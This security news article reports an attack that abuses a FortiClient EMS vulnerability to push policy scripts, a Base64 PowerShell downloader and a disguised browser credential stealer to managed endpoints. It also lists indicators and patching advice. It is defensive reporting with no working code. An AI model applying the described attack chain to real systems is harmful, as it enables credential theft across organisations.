Critical FortiClient EMS Vulnerability Exploited to Deploy Credential-Stealing Malware
In May 2026, cybersecurity firm Arctic Wolf identified a sophisticated cyberattack targeting FortiClient Endpoint Management Server (EMS) deployments. Threat actors exploited a critical vulnerability, designated as CVE-2026-35616 with a CVSS score of 9.1, to distribute credential-stealing malware across managed endpoints. This flaw, a pre-authentication API access bypass leading to privilege escalation, was addressed by Fortinet in FortiClient EMS version 7.4.7 and later.
Exploitation Methodology
The attackers infiltrated the EMS by exploiting CVE-2026-35616, allowing them to gain unauthorized access and escalate privileges. Once inside, they manipulated the EMS configurations to delay firmware upgrade notifications and altered Remote Access Profile settings. This manipulation enabled the insertion of malicious scripts into endpoint policies, which were then executed on the managed devices.
Arctic Wolf’s analysis revealed that the adversaries utilized FortiClient’s management pathways to deploy PowerShell commands that appeared as legitimate administrative operations. This approach allowed the attackers to execute malicious scripts across all managed endpoints without needing separate intrusion methods for each device.
Malware Deployment and Execution
The attack leveraged fortitray.exe, a legitimate FortiClient executable, to initiate a .cmd script via cmd.exe. This script executed a Base64-encoded PowerShell command designed to download and run a malicious payload. The payload, disguised as FortiEndpoint_Patch.exe, masqueraded as a legitimate update but was, in fact, a previously unidentified Windows information stealer.
This malware harvested sensitive data, including passwords, cookies, and autofill information such as credit card details, addresses, and phone numbers from browsers based on Chromium and Gecko. The collected data was stored in a log file within the ProgramData directory. Notably, the stealer lacked direct network exfiltration capabilities; instead, the PowerShell script transmitted the harvested data to an attacker-controlled server at 83.138.53[.]110 via an HTTP POST request.
Implications and Recommendations
By bypassing API authentication and interacting with EMS functionalities in a privileged context, the attackers were able to modify management configurations and push malicious scripts for execution on managed endpoints. This method allowed them to exploit trusted infrastructure to distribute malware, effectively turning the EMS into a conduit for widespread infection.
The stolen session cookies and saved browser credentials could grant attackers further access to cloud services, internal applications, and other authenticated resources. In some cases, session reuse might circumvent multi-factor authentication (MFA) prompts, posing significant security risks.
Organizations utilizing FortiClient EMS are strongly advised to upgrade to version 7.4.7 or later to mitigate this vulnerability. Additionally, implementing robust monitoring of EMS configurations and endpoint activities can help detect and prevent unauthorized modifications. Regularly reviewing and updating security protocols, along with educating staff on potential phishing tactics, can further enhance an organization’s defense against such sophisticated attacks.
